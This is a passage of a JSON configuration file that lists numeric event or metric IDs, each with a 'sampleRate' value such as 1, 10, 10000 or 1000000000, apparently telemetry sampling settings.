"sampleRate": 1
},
"54919198": {
"sampleRate": 1
},
"54919199": {
"sampleRate": 1
},
"54920477": {
"sampleRate": 1
},
"54920986": {
"sampleRate": 1
},
"54922073": {
"sampleRate": 1
},
"54923806": {
"sampleRate": 1
},
"54924629": {
"sampleRate": 1
},
"54926560": {
"sampleRate": 1
},
"54927157": {
"sampleRate": 1
},
"54928841": {
"sampleRate": 1
},
"54930074": {
"sampleRate": 1
},
"54930508": {
"sampleRate": 1
},
"54932258": {
"sampleRate": 1
},
"54934991": {
"sampleRate": 1
},
"54935139": {
"sampleRate": 1
},
"54935506": {
"sampleRate": 1
},
"55181314": {
"sampleRate": 1
},
"55181315": {
"sampleRate": 1
},
"55181316": {
"sampleRate": 1
},
"55181317": {
"sampleRate": 1
},
"55246849": {
"sampleRate": 1
},
"55246850": {
"sampleRate": 1000000000
},
"55312385": {
"sampleRate": 1
},
"55312386": {
"sampleRate": 1
},
"55312388": {
"sampleRate": 1
},
"55325709": {
"sampleRate": 1
},
"55443457": {
"sampleRate": 1
},
"55443458": {
"sampleRate": 1
},
"55443459": {
"sampleRate": 1
},
"55443460": {
"sampleRate": 1
},
"55447349": {
"sampleRate": 1
},
"55465642": {
"sampleRate": 1
},
"55508994": {
"sampleRate": 1
},
"55508995": {
"sampleRate": 1
},
"55508996": {
"sampleRate": 1
},
"55517182": {
"sampleRate": 1
},
"55574529": {
"sampleRate": 10000
},
"55574530": {
"sampleRate": 1
},
"55577701": {
"sampleRate": 1
},
"55580822": {
"sampleRate": 1
},
"55836673": {
"sampleRate": 1
},
"55836674": {
"sampleRate": 1000000000
},
"55836675": {
"sampleRate": 1000000000
},
"55836676": {
"sampleRate": 1000000000
},
"55836677": {
"sampleRate": 1000000000
},
"55836678": {
"sampleRate": 10000
},
"55838299": {
"sampleRate": 1
},
"55838475": {
"sampleRate": 10000
},
"55838751": {
"sampleRate": 1
},
"55839297": {
"sampleRate": 1
},
"55839576": {
"sampleRate": 1
},
"55967745": {
"sampleRate": 1
},
"55967746": {
"sampleRate": 1
},
"55967747": {
"sampleRate": 1
},
"55967748": {
"sampleRate": 1
},
"56360961": {
"sampleRate": 1
},
"57344001": {
"sampleRate": 1
},
"57344002": {
"sampleRate": 10
},
"57344003": {
"sampleRate": 1
},
"57344004": {
"sampleRate": 1
},
"57344005": {
"sampleRate": 10000
},
"57409537": {
"sampleRate": 100000000
},
"57409538": {
"sampleRate": 100000000
},
"57409539": {
"sampleRate": 100000000
},
"57414808": {
"sampleRate": 10000
},
"57416887": {
"sampleRate": 10000
},
"57423572": {
"sampleRate": 10000
},
"57424600": {
"sampleRate": 10000
},
"57630710": {
"sampleRate": 1
},
"57671681": {
"sampleRate": 1
},
"57671682": {
"sampleRate": 1
},
"57671683": {
"sampleRate": 1
},
"57671684": {
"sampleRate": 1
},
"57671685": {
"sampleRate": 1
},
"57673015": {
"sampleRate": 1
},
"57673101": {
"sampleRate": 1
},
"57676962": {
"sampleRate": 1
},
"57678366": {
"sampleRate": 1
},
"57679159": {
"sampleRate": 1
},
"57679681": {
"sampleRate": 1
},
"57680423": {
"sampleRate": 1
},
"57681719": {
"sampleRate": 1
},
"57933825": {
"sampleRate": 1
},
"57999361": {
"sampleRate": 1
},
"57999362": {
"sampleRate": 1
},
"58195969": {
"sampleRate": 1
},
"58195970": {
"sampleRate": 1
},
"58195971": {
"sampleRate": 1
},
"58197575": {
"sampleRate": 1
},
"58198230": {
"sampleRate": 1
},
"58198910": {
"sampleRate": 1
},
"58199413": {
"sampleRate": 1
},
"58200119": {
"sampleRate": 1
},
"58200302": {
"sampleRate": 1
},
"58203112": {
"sampleRate": 1
},
"58203187": {
"sampleRate": 1
},
"58203836": {
"sampleRate": 1
},
"58204719": {
"sampleRate": 1
},
"58204796": {
"sampleRate": 1
},
"58205292": {
"sampleRate": 1
},
"58207372": {
"sampleRate": 1
},
"58207791": {
"sampleRate": 1
},
"58208472": {
"sampleRate": 1
},
"58208772": {
"sampleRate": 1
},
"58209083": {
"sampleRate": 1
},
"58209723": {
"sampleRate": 1
},
"58209742": {
"sampleRate": 1
},
"58210323": {
"sampleRate": 1
},
"58210485": {
"sampleRate": 1
},
"58211469": {
"sampleRate": 1
},
"58211715": {
"sampleRate": 1
},
"58211900": {
"sampleRate": 1
},
"58458114": {
"sampleRate": 1
},
"58458115": {
"sampleRate": 1
},
"58461407": {
"sampleRate": 1
},
"58464469": {
"sampleRate": 1
},
"58471621": {
"sampleRate": 1
},
"58654721": {
"sampleRate": 1
},
"58654722": {
"sampleRate": 1
},
"58654723": {
"sampleRate": 1
},
"59244545": {
"sampleRate": 1
},
"59244546": {
"sampleRate": 1
},
"59249609": {
"sampleRate": 1
},
"59251734": {
"sampleRate": 1
},
"59255771": {
"sampleRate": 1
},
"59506689": {
"sampleRate": 10000
},
"59899905": {
"sampleRate": 1
},
"59899906": {
"sampleRate": 1
},
"59899907": {
"sampleRate": 1
},
"59899908": {
"sampleRate": 1
},
"59899909": {
"sampleRate": 1
},
"61276161": {
"sampleRate": 1
},
"61276162": {
"sampleRate": 1
},
"61276163": {
"sampleRate": 1
},
"61276164": {
"sampleRate": 1
},
"62128129": {
"sampleRate": 1
},
"62128130": {
"sampleRate": 1
},
"62128131": {
"sampleRate": 1
},
"62128132": {
"sampleRate": 1
},
"62128133": {
"sampleRate": 1
},
"62128134": {
"sampleRate": 1
},
"62128135": {
"sampleRate": 1
},
"62324739": {
"sampleRate": 1
},
"62455809": {
"sampleRate": 1
},
"62455810": {
"sampleRate": 1
},
"62455811": {
"sampleRate": 1
},
"62521345": {
"sampleRate": 10
},
"62521346": {
"sampleRate": 10
},
"62521347": {
"sampleRate": 10
},
"62521348": {
"sampleRate": 10
},
"62521349": {
"sampleRate": 10
},
"62521350": {
"sampleRate": 10
},
"62532802": {
"sampleRate": 10
},
"62586881": {
"sampleRate": 10
},
"62590082": {
"sampleRate": 1
},
"62594499": {
"sampleRate": 10
},
"62914562": {
"sampleRate": 1
},
"62980097": {
"sampleRate": 10000
},
"63373313": {
"sampleRate": 1
},
"63438849": {
"sampleRate": 1
},
"63443246": {
"sampleRate": 1
},
"63443755": {
"sampleRate": 1
},
"63443792": {
"sampleRate": 1
},
"63444114": {
"sampleRate": 1
},
"63445111": {
"sampleRate": 1
},
"63445172": {
"sampleRate": 1
},
"63451466": {
"sampleRate": 1
},
"63504385": {
"sampleRate": 1
},
"63504386": {
"sampleRate": 1
},
"63504387": {
"sampleRate": 1
},
"63569921": {
"sampleRate": 1
},
"63635457": {
"sampleRate": 1
},
"63700993": {
"sampleRate": 1
},
"63700994": {
"sampleRate": 1
},
"63700995": {
"sampleRate": 1
},
"63700996": {
"sampleRate": 1
},
"63700997": {
"sampleRate": 1
},
"63963137": {
"sampleRate": 1
},
"64044054": {
"sampleRate": 10000
},
"64230141": {
"sampleRate": 10000
},
"64232355": {
"sampleRate": 10000
},
"64233826": {
"sampleRate": 10000
},
"64240099": {
"sampleRate": 10000
},
"79364097": {
"sampleRate": 1
},
"81599639": {
"sampleRate": 10000
},
"81601374": {
"sampleRate": 10000
},
"81602848": {
"sampleRate": 10000
},
"81607290": {
"sampleRate": 10000
},
"81725894": {
"sampleRate": 10000
},
"81735603": {
"sampleRate": 10000
},
"81739010": {
"sampleRate": 10000
},
"91489522": {
"sampleRate": 1
},
"91490110": {
"sampleRate": 1
},
"91493742": {
"sampleRate": 1
},
"91497584": {
"sampleRate": 1
},
"91500519": {
"sampleRate": 1
},
"91501860": {
"sampleRate": 1
},
"95289345": {
"sampleRate": 10000
},
"96997416": {
"sampleRate": 10000
},
"97590506": {
"sampleRate": 1
},
"97590967": {
"sampleRate": 10000
},
"97598603": {
"sampleRate": 1
},
"101648941": {
"sampleRate": 1
},
"101652143": {
"sampleRate": 1
},
"109772801": {
"sampleRate": 1
},
"109774781": {
"sampleRate": 1
},
"109774948": {
"sampleRate": 1
},
"109775999": {
"sampleRate": 1
},
"109776315": {
"sampleRate": 1
},
"109777419": {
"sampleRate": 1
},
"109777541": {
"sampleRate": 1
},
"109781457": {
"sampleRate": 1
},
"109782244": {
"sampleRate": 1
},
"109782888": {
"sampleRate": 1
},
"109784985": {
"sampleRate": 1
},
"109785685": {
"sampleRate": 1
},
"109787338": {
"sampleRate": 1
},
"110176278": {
"sampleRate": 10000
},
"110178557": {
"sampleRate": 10000
},
"124989707": {
"sampleRate": 1
},
"127468755": {
"sampleRate": 1
},
"127468795": {
"sampleRate": 1
},
"127469845": {
"sampleRate": 1
},
"127470547": {
"sampleRate": 1
},
"127470924": {
"sampleRate": 1
},
"127471679": {
"sampleRate": 1
},
"127471680": {
"sampleRate": 1
},
"127473053": {
"sampleRate": 1
},
"127474327": {
"sampleRate": 1
},
"127477457": {
"sampleRate": 1
},
"127481618": {
"sampleRate": 1
},
"127481936": {
"sampleRate": 1
},
"127483160": {
"sampleRate": 1
},
"133629496": {
"sampleRate": 10000
},
"133629646": {
"sampleRate": 10000
},
"133643077": {
"sampleRate": 10000
},
"137428993": {
"sampleRate": 1
},
"137428994": {
"sampleRate": 1
},
"137430964": {
"sampleRate": 1
},
"137440519": {
"sampleRate": 1
},
"137442620": {
"sampleRate": 1
},
"138810076": {
"sampleRate": 1
},
"138816378": {
"sampleRate": 1
},
"138820675": {
"sampleRate": 1
},
"141363848": {
"sampleRate": 1
},
"141372740": {
"sampleRate": 1
},
"141492225": {
"sampleRate": 1
},
"141502565": {
"sampleRate": 1
},
"144444239": {
"sampleRate": 1
},
"144445421": {
"sampleRate": 1
},
"144450614": {
"sampleRate": 1
},
"144452084": {
"sampleRate": 1
},
"144452614": {
"sampleRate": 1
},
"144456097": {
"sampleRate": 1
},
"144456247": {
"sampleRate": 1
},
"159779919": {
"sampleRate": 1
},
"183762945": {
"sampleRate": 1
},
"183767196": {
"sampleRate": 1
},
"183834837": {
"sampleRate": 10000
},
"188746120": {
"sampleRate": 10000
},
"188755890": {
"sampleRate": 10000
},
"188755925": {
"sampleRate": 10000
},
"195626194": {
"sampleRate": 1
},
"195639692": {
"sampleRate": 1
},
"205198634": {
"sampleRate": 1
},
"205207410": {
"sampleRate": 1
},
"209979636": {
"sampleRate": 1
},
"209989735": {
"sampleRate": 1
},
"213129059": {
"sampleRate": 1
},
"213130080": {
"sampleRate": 1
},
"213131472": {
"sampleRate": 1
},
"213135039": {
"sampleRate": 1
},
"216401752": {
"sampleRate": 1
},
"216401890": {
"sampleRate": 1
},
"218051286": {
"sampleRate": 1
},
"218956945": {
"sampleRate": 1
},
"218961347": {
"sampleRate": 1
},
"218962025": {
"sampleRate": 1
},
"218962528": {
"sampleRate": 1
},
"218962602": {
"sampleRate": 1
},
"218962996": {
"sampleRate": 1
},
"218966113": {
"sampleRate": 1
},
"218969087": {
"sampleRate": 1
},
"218969883": {
"sampleRate": 1
},
"218970026": {
"sampleRate": 1
},
"218970632": {
"sampleRate": 1
},
"218971974": {
"sampleRate": 1
},
"221778284": {
"sampleRate": 1
},
"221779419": {
"sampleRate": 1
},
"221782154": {
"sampleRate": 1
},
"221784362": {
"sampleRate": 1
},
"221786123": {
"sampleRate": 1
},
"221789966": {
"sampleRate": 1
},
"229318739": {
"sampleRate": 10000
},
"229321197": {
"sampleRate": 10000
},
"232522766": {
"sampleRate": 1
},
"232530588": {
"sampleRate": 1
},
"232531238": {
"sampleRate": 1
},
"232536317": {
"sampleRate": 1
},
"232726078": {
"sampleRate": 1
},
"237963161": {
"sampleRate": 10000
},
"241050641": {
"sampleRate": 1
},
"241052667": {
"sampleRate": 1
},
"241055991": {
"sampleRate": 1
},
"241568984": {
"sampleRate": 1
},
"241569419": {
"sampleRate": 1
},
"241575915": {
"sampleRate": 1
},
"262995969": {
"sampleRate": 1
},
"263004866": {
"sampleRate": 1
},
"270205944": {
"sampleRate": 1
},
"270206071": {
"sampleRate": 1
},
"270206085": {
"sampleRate": 1
},
"270206168": {
"sampleRate": 1
},
"270206214": {
"sampleRate": 1
},
"270206215": {
"sampleRate": 1
},
"270206216": {
"sampleRate": 1
},
"270206224": {
"sampleRate": 1
},
"270206230": {
"sampleRate": 1
},
"270206253": {
"sampleRate": 1
},
"270206259": {
"sampleRate": 1
},
"270206315": {
"sampleRate": 1
},
"270206388": {
"sampleRate": 1
},
"270206588": {
"sampleRate": 1
},
"270206696": {
"sampleRate": 1
},
"270206744": {
"sampleRate": 1
},
"270206832": {
"sampleRate": 1
},
"270206843": {
"sampleRate": 1
},
"270206870": {
"sampleRate": 1
},
"270207098": {
"sampleRate": 1
},
"270207136": {
"sampleRate": 1
},
"270207148": {
"sampleRate": 1
},
"270207296": {
"sampleRate": 1
},
"270207420": {
"sampleRate": 1
},
"270207600": {
"sampleRate": 1
},
"270207618": {
"sampleRate": 1
},
"270207797": {
"sampleRate": 1
},
"270207843": {
"sampleRate": 1
},
"270207912": {
"sampleRate": 1
},
"270207953": {
"sampleRate": 1
},
"270208007": {
"sampleRate": 1
},
"270208148": {
"sampleRate": 1
},
"270208178": {
"sampleRate": 1
},
"270208265": {
"sampleRate": 1
},
"270208269": {
"sampleRate": 1
},
"270208286": {
"sampleRate": 1
},
"270208333": {
"sampleRate": 1
},
"270208406": {
"sampleRate": 1
},
"270208527": {
"sampleRate": 1
},
"270208656": {
"sampleRate": 1
},
"270208708": {
"sampleRate": 1
},
"270208826": {
"sampleRate": 1
},
"270208920": {
"sampleRate": 1
},
"270209003": {
"sampleRate": 1
},
"270209052": {
"sampleRate": 1
},
"270209091": {
"sampleRate": 1
},
"270209102": {
"sampleRate": 1
},
"270209148": {
"sampleRate": 1
},
"270209262": {
"sampleRate": 1
},
"270209274": {
"sampleRate": 1
},
"270209329": {
"sampleRate": 1
},
"270209402": {
"sampleRate": 1
},
"270209445": {
"sampleRate": 1
},
"270209519": {
"sampleRate": 1
},
"270209660": {
"sampleRate": 1
},
"270209661": {
"sampleRate": 1
},
"270209760": {
"sampleRate": 1
},
"270209775": {
"sampleRate": 1
},
"270209815": {
"sampleRate": 1
},
"270209843": {
"sampleRate": 1
},
"270209902": {
"sampleRate": 1
},
"270209991": {
"sampleRate": 1
},
"270210074": {
"sampleRate": 1
},
"270210163": {
"sampleRate": 1
},
"270210164": {
"sampleRate": 1
},
"270210188": {
"sampleRate": 1
},
"270210235": {
"sampleRate": 1
},
"270210265": {
"sampleRate": 1
},
"270210288": {
"sampleRate": 1
},
"270210332": {
"sampleRate": 1
},
"270210419": {
"sampleRate": 1
},
"270210475": {
"sampleRate": 1
},
"270210517": {
"sampleRate": 1
},
"270210724": {
"sampleRate": 1
},
"270210806": {
"sampleRate": 1
},
"270210841": {
"sampleRate": 1
},
"270210869": {
"sampleRate": 1
},
"270210979": {
"sampleRate": 1
},
"270211090": {
"sampleRate": 1
},
"270211138": {
"sampleRate": 1
},
"270211171": {
"sampleRate": 1
},
"270211202": {
"sampleRate": 1
},
"270211218": {
"sampleRate": 1
},
"270211281": {
"sampleRate": 1
},
"270211332": {
"sampleRate": 1
},
"270211335": {
"sampleRate": 1
},
"270211347": {
"sampleRate": 1
},
"270211419": {
"sampleRate": 1
},
"270211435": {
"sampleRate": 1
},
"270211506": {
"sampleRate": 1
},
"270211692": {
"sampleRate": 1
},
"270211722": {
"sampleRate": 1
},
"270211753": {
"sampleRate": 1
},
"270211772": {
"sampleRate": 1
},
"270211786": {
"sampleRate": 1
},
"270211803": {
"sampleRate": 1
},
"270211869": {
"sampleRate": 1
},
"270211949": {
"sampleRate": 1
},
"270212138": {
"sampleRate": 1
},
"270212216": {
"sampleRate": 1
},
"270212219": {
"sampleRate": 1
},
"270212238": {
"sampleRate": 1
},
"270212273": {
"sampleRate": 1
},
"270212277": {
"sampleRate": 1
},
"270212441": {
"sampleRate": 1
},
"270212554": {
"sampleRate": 1
},
"270212656": {
"sampleRate": 1
},
"270212671": {
"sampleRate": 1
},
"270212696": {
"sampleRate": 1
},
"270212843": {
"sampleRate": 1
},
"270212857": {
"sampleRate": 1
},
"270212893": {
"sampleRate": 1
},
"270213015": {
"sampleRate": 1
},
"270213108": {
"sampleRate": 1
},
"270213135": {
"sampleRate": 1
},
"270213161": {
"sampleRate": 1
},
"270213250": {
"sampleRate": 1
},
"270213359": {
"sampleRate": 1
},
"270213374": {
"sampleRate": 1
},
"270213486": {
"sampleRate": 1
},
"270213512": {
"sampleRate": 1
},
"270213572": {
"sampleRate": 1
},
"270213649": {
"sampleRate": 1
},
"270213707": {
"sampleRate": 1
},
"270213723": {
"sampleRate": 1
},
"270213749": {
"sampleRate": 1
},
"270213786": {
"sampleRate": 1
},
"270214027": {
"sampleRate": 1
},
"270214035": {
"sampleRate": 1
},
"270214052": {
"sampleRate": 1
},
"270214189": {
"sampleRate": 1
},
"270214320": {
"sampleRate": 1
},
"270214400": {
"sampleRate": 1
},
"270214409": {
"sampleRate": 1
},
"270214459": {
"sampleRate": 1
},
"270214580": {
"sampleRate": 1
},
"270214602": {
"sampleRate": 1
},
"270214612": {
"sampleRate": 1
},
"270214705": {
"sampleRate": 1
},
"270214707": {
"sampleRate": 1
},
"270214719": {
"sampleRate": 1
},
"270214731": {
"sampleRate": 1
},
"270214784": {
"sampleRate": 1
},
"270214832": {
"sampleRate": 1
},
"270214973": {
"sampleRate": 1
},
"270214989": {
"sampleRate": 1
},
"270215065": {
"sampleRate": 1
},
"270215070": {
"sampleRate": 1
},
"270215101": {
"sampleRate": 1
},
"270215116": {
"sampleRate": 1
},
"270215140": {
"sampleRate": 1
},
"270215224": {
"sampleRate": 1
},
"270215230": {
"sampleRate": 1
},
"270215347": {
"sampleRate": 1
},
"270215397": {
"sampleRate": 1
},
"270215429": {
"sampleRate": 1
},
"270215542": {
"sampleRate": 1
},
"270215574": {
"sampleRate": 1
},
"270215690": {
"sampleRate": 1
},
"270215709": {
"sampleRate": 1
},
"270215742": {
"sampleRate": 1
},
"270215772": {
"sampleRate": 1
},
"270215778": {
"sampleRate": 1
},
"270215792": {
"sampleRate": 1
},
"270215819": {
"sampleRate": 1
},
"270215979": {
"sampleRate": 1
},
"270216000": {
"sampleRate": 1
},
"270216093": {
"sampleRate": 1
},
"270216182": {
"sampleRate": 1
},
"270216200": {
"sampleRate": 1
},
"270216416": {
"sampleRate": 1
},
"270216430": {
"sampleRate": 1
},
"270216713": {
"sampleRate": 1
},
"270216791": {
"sampleRate": 1
},
"270216793": {
"sampleRate": 1
},
"270216818": {
"sampleRate": 1
},
"270216896": {
"sampleRate": 1
},
"270216915": {
"sampleRate": 1
},
"270216928": {
"sampleRate": 1
},
"270216941": {
"sampleRate": 1
},
"270217026": {
"sampleRate": 1
},
"270217057": {
"sampleRate": 1
},
"270217068": {
"sampleRate": 1
},
"270217210": {
"sampleRate": 1
},
"270217236": {
"sampleRate": 1
},
"270217256": {
"sampleRate": 1
},
"270217283": {
"sampleRate": 1
},
"270217313": {
"sampleRate": 1
},
"270217327": {
"sampleRate": 1
},
"270217401": {
"sampleRate": 1
},
"270217492": {
"sampleRate": 1
},
"270217539": {
"sampleRate": 1
},
"270217616": {
"sampleRate": 1
},
"270217631": {
"sampleRate": 1
},
"270217722": {
"sampleRate": 1
},
"270217749": {
"sampleRate": 1
},
"270217779": {
"sampleRate": 1
},
"270217787": {
"sampleRate": 1
},
"270217798": {
"sampleRate": 1
},
"270217820": {
"sampleRate": 1
},
"270217862": {
"sampleRate": 1
},
"270217878": {
"sampleRate": 1
},
"270217900": {
"sampleRate": 1
},
"270217954": {
"sampleRate": 1
},
"270218007": {
"sampleRate": 1
},
"270218053": {
"sampleRate": 1
},
"270218090": {
"sampleRate": 1
},
"270218102": {
"sampleRate": 1
},
"270218152": {
"sampleRate": 1
},
"270218163": {
"sampleRate": 1
},
"270218166": {
"sampleRate": 1
},
"270218168": {
"sampleRate": 1
},
"270218204": {
"sampleRate": 1
},
"270218271": {
"sampleRate": 1
},
"270218310": {
"sampleRate": 1
},
"270218338": {
"sampleRate": 1
},
"270218436": {
"sampleRate": 1
},
"270218543": {
"sampleRate": 1
},
"270218572": {
"sampleRate": 1
},
"270218586": {
"sampleRate": 1
},
"270218605": {
"sampleRate": 1
},
"270218622": {
"sampleRate": 1
},
"270218660": {
"sampleRate": 1
},
"270218696": {
"sampleRate": 1
},
"270218731": {
"sampleRate": 1
},
"270218991": {
"sampleRate": 1
},
"270219017": {
"sampleRate": 1
},
"270219019": {
"sampleRate": 1
},
"270219051": {
"sampleRate": 1
},
"270219139": {
"sampleRate": 1
},
"270219169": {
"sampleRate": 1
},
"270219188": {
"sampleRate": 1
},
"270219248": {
"sampleRate": 1
},
"270219249": {
"sampleRate": 1
},
"270219303": {
"sampleRate": 1
},
"270219320": {
"sampleRate": 1
},
"270219404": {
"sampleRate": 1
},
"270219449": {
"sampleRate": 1
},
"270219483": {
"sampleRate": 1
},
"270219531": {
"sampleRate": 1
},
"270219562": {
"sampleRate": 1
},
"270219686": {
"sampleRate": 1
},
"270219870": {
"sampleRate": 1
},
"270219914": {
"sampleRate": 1
},
"270219926": {
"sampleRate": 1
},
"270220001": {
"sampleRate": 1
},
"270220072": {
"sampleRate": 1
},
"270220074": {
"sampleRate": 1
},
"270220108": {
"sampleRate": 1
},
"270220209": {
"sampleRate": 1
},
"270220261": {
"sampleRate": 1
},
"270220262": {
"sampleRate": 1
},
"270220333": {
"sampleRate": 1
},
"270220347": {
"sampleRate": 1
},
"270220481": {
"sampleRate": 1
},
"270220499": {
"sampleRate": 1
},
"270220550": {
"sampleRate": 1
},
"270220595": {
"sampleRate": 1
},
"270220640": {
"sampleRate": 1
},
"270220731": {
"sampleRate": 1
},
"270220850": {
"sampleRate": 1
},
"270220865": {
"sampleRate": 1
},
"270220879": {
"sampleRate": 1
},
"270220889": {
"sampleRate": 1
},
"270220997": {
"sampleRate": 1
},
"270221024": {
"sampleRate": 1
},
"270221065": {
"sampleRate": 1
},
"270221124": {
"sampleRate": 1
},
"270221133": {
"sampleRate": 1
},
"270221175": {
"sampleRate": 1
},
"270221177": {
"sampleRate": 1
},
"270224526": {
"sampleRate": 1
},
"270228232": {
"sampleRate": 1
},
"270230590": {
"sampleRate": 1
},
"270230822": {
"sampleRate": 1
},
"270232559": {
"sampleRate": 1
},
"270233440": {
"sampleRate": 1
},
"273481729": {
"sampleRate": 1
},
"295437299": {
"sampleRate": 1
},
"295437333": {
"sampleRate": 1
},
"295437392": {
"sampleRate": 1
},
"295437809": {
"sampleRate": 1
},
"295437849": {
"sampleRate": 1
},
"295438195": {
"sampleRate": 1
},
"295438980": {
"sampleRate": 1
},
"295439218": {
"sampleRate": 1
},
"295439505": {
"sampleRate": 1
},
"295439522": {
"sampleRate": 1
},
"295439982": {
"sampleRate": 1
},
"295440238": {
"sampleRate": 1
},
"295440518": {
"sampleRate": 1
},
"295440638": {
"sampleRate": 1
},
"295441099": {
"sampleRate": 1
},
"295441104": {
"sampleRate": 1
},
"295441165": {
"sampleRate": 1
},
"295441218": {
"sampleRate": 1
},
"295441453": {
"sampleRate": 1
},
"295442359": {
"sampleRate": 1
},
"295442443": {
"sampleRate": 1
},
"295442568": {
"sampleRate": 1
},
"295442707": {
"sampleRate": 1
},
"295443394": {
"sampleRate": 1
},
"295443659": {
"sampleRate": 1
},
"295443660": {
"sampleRate": 1
},
"295444052": {
"sampleRate": 1
},
"295444086": {
"sampleRate": 1
},
"295444127": {
"sampleRate": 1
},
"295444428": {
"sampleRate": 1
},
"295444872": {
"sampleRate": 1
},
"295444992": {
"sampleRate": 1
},
"295445045": {
"sampleRate": 1
},
"295445259": {
"sampleRate": 1
},
"295445408": {
"sampleRate": 1
},
"295445507": {
"sampleRate": 1
},
"295446153": {
"sampleRate": 1
},
"295446230": {
"sampleRate": 1
},
"295446251": {
"sampleRate": 1
},
"295446586": {
"sampleRate": 1
},
"295447411": {
"sampleRate": 1
},
"295447532": {
"sampleRate": 1
},
"295447763": {
"sampleRate": 1
},
"295448628": {
"sampleRate": 1
},
"295448870": {
"sampleRate": 1
},
"295448939": {
"sampleRate": 1
},
"295449023": {
"sampleRate": 1
},
"295449229": {
"sampleRate": 1
},
"295449938": {
"sampleRate": 1
},
"295450853": {
"sampleRate": 1
},
"295450962": {
"sampleRate": 1
},
"295451974": {
"sampleRate": 1
},
"295451977": {
"sampleRate": 1
},
"295452084": {
"sampleRate": 1
},
"295576223": {
"sampleRate": 1
},
"300429672": {
"sampleRate": 10000
},
"316804045": {
"sampleRate": 10
},
"316804194": {
"sampleRate": 10
},
"316804412": {
"sampleRate": 10
},
"316805991": {
"sampleRate": 10
},
"316806070": {
"sampleRate": 10
},
"316806359": {
"sampleRate": 1
},
"316806850": {
"sampleRate": 10
},
"316810886": {
"sampleRate": 10
},
"316812351": {
"sampleRate": 10
},
"316812736": {
"sampleRate": 10
},
"316814957": {
"sampleRate": 10
},
"316816142": {
"sampleRate": 10
},
"316816299": {
"sampleRate": 10
},
"318701569": {
"sampleRate": 1
},
"318707653": {
"sampleRate": 1
},
"318716922": {
"sampleRate": 1
},
"320809182": {
"sampleRate": 1
},
"335941383": {
"sampleRate": 10000
},
"336201917": {
"sampleRate": 1
},
"336205322": {
"sampleRate": 1
},
"336207527": {
"sampleRate": 1
},
"336212887": {
"sampleRate": 1
},
"336213902": {
"sampleRate": 1
},
"336215495": {
"sampleRate": 1
},
"339818860": {
"sampleRate": 1
},
"341835776": {
"sampleRate": 1
},
"341835777": {
"sampleRate": 1
},
"341848280": {
"sampleRate": 1
},
"348132017": {
"sampleRate": 1
},
"351537509": {
"sampleRate": 1
},
"351539528": {
"sampleRate": 1
},
"351539711": {
"sampleRate": 1
},
"351539882": {
"sampleRate": 1
},
"351540102": {
"sampleRate": 1
},
"351540413": {
"sampleRate": 1
},
"351540800": {
"sampleRate": 1
},
"351541595": {
"sampleRate": 1
},
"351542287": {
"sampleRate": 1
},
"351543111": {
"sampleRate": 1
},
"351543947": {
"sampleRate": 1
},
"351544664": {
"sampleRate": 1
},
"351545881": {
"sampleRate": 1
},
"351546487": {
"sampleRate": 1
},
"351546651": {
"sampleRate": 1
},
"351548245": {
"sampleRate": 1
},
"351548391": {
"sampleRate": 1
},
"351548854": {
"sampleRate": 1
},
"353711086": {
"sampleRate": 1
},
"359138377": {
"sampleRate": 10000
},
"359143250": {
"sampleRate": 10000
},
"359149373": {
"sampleRate": 10000
},
"368647392": {
"sampleRate": 1
},
"373295708": {
"sampleRate": 1
},
"373298325": {
"sampleRate": 1
},
"373308219": {
"sampleRate": 1
},
"374672177": {
"sampleRate": 1
},
"377357808": {
"sampleRate": 1
},
"377358784": {
"sampleRate": 1
},
"377359040": {
"sampleRate": 1
},
"377359367": {
"sampleRate": 1
},
"377359743": {
"sampleRate": 1
},
"377360139": {
"sampleRate": 1
},
"377360510": {
"sampleRate": 1
},
"377361415": {
"sampleRate": 1
},
"377362087": {
"sampleRate": 5
},
"377362266": {
"sampleRate": 1
},
"377363484": {
"sampleRate": 1
},
"377364678": {
"sampleRate": 1
},
"377364955": {
"sampleRate": 1
},
"377364984": {
"sampleRate": 1
},
"377367558": {
"sampleRate": 1
},
"377367763": {
"sampleRate": 5
},
"377369626": {
"sampleRate": 1
},
"377370025": {
"sampleRate": 1
},
"377370051": {
"sampleRate": 1
},
"377370203": {
"sampleRate": 1
},
"377370433": {
"sampleRate": 1
},
"377371065": {
"sampleRate": 1
},
"377371646": {
"sampleRate": 1
},
"377817277": {
"sampleRate": 1
},
"377828343": {
"sampleRate": 1
},
"382468096": {
"sampleRate": 1
},
"382468097": {
"sampleRate": 1
},
"382468098": {
"sampleRate": 1
},
"382468099": {
"sampleRate": 1
},
"382482261": {
"sampleRate": 1
},
"390269683": {
"sampleRate": 1
},
"390272426": {
"sampleRate": 1
},
"390275150": {
"sampleRate": 1
},
"390276342": {
"sampleRate": 10000
},
"390279467": {
"sampleRate": 10000
},
"390280883": {
"sampleRate": 10000
},
"390281220": {
"sampleRate": 10000
},
"390281974": {
"sampleRate": 10000
},
"392106711": {
"sampleRate": 1
},
"392107390": {
"sampleRate": 1
},
"392115811": {
"sampleRate": 1
},
"392966766": {
"sampleRate": 10000
},
"394788865": {
"sampleRate": 10000
},
"398591833": {
"sampleRate": 1
},
"398592311": {
"sampleRate": 1
},
"398592899": {
"sampleRate": 1
},
"398594779": {
"sampleRate": 1
},
"398601326": {
"sampleRate": 1
},
"398604674": {
"sampleRate": 1
},
"398605840": {
"sampleRate": 1
},
"403271918": {
"sampleRate": 1
},
"426382631": {
"sampleRate": 1
},
"426385027": {
"sampleRate": 1
},
"426389483": {
"sampleRate": 1
},
"430374913": {
"sampleRate": 1
},
"430378067": {
"sampleRate": 1
},
"430383451": {
"sampleRate": 1
},
"430386496": {
"sampleRate": 1
},
"430390878": {
"sampleRate": 1
},
"430391177": {
"sampleRate": 1
},
"431626709": {
"sampleRate": 1
},
"431630887": {
"sampleRate": 10
},
"432676234": {
"sampleRate": 1
},
"432677504": {
"sampleRate": 1
},
"432679263": {
"sampleRate": 1
},
"432682775": {
"sampleRate": 1
},
"432683819": {
"sampleRate": 1
},
"435684623": {
"sampleRate": 100
},
"435684729": {
"sampleRate": 100
},
"435684980": {
"sampleRate": 100
},
"435685229": {
"sampleRate": 100
},
"435685848": {
"sampleRate": 100
},
"435686268": {
"sampleRate": 100
},
"435687015": {
"sampleRate": 100
},
"435687530": {
"sampleRate": 100
},
"435687537": {
"sampleRate": 100
},
"435687801": {
"sampleRate": 100
},
"435688416": {
"sampleRate": 100
},
"435688603": {
"sampleRate": 100
},
"435688620": {
"sampleRate": 100
},
"435689044": {
"sampleRate": 100
},
"435689085": {
"sampleRate": 100
},
"435689154": {
"sampleRate": 100
},
"435689259": {
"sampleRate": 100
},
"435689828": {
"sampleRate": 100
},
"435690518": {
"sampleRate": 100
},
